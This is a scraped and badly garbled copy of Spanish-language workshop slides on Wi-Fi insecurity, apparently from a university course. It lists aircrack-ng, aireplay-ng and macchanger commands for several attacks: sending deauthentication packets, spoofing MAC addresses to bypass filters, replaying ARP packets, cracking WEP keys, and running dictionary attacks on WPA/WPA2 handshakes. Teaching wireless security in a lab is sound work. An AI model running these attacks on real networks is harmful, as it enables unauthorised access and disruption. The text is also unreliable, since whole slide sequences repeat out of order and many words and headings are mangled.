bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
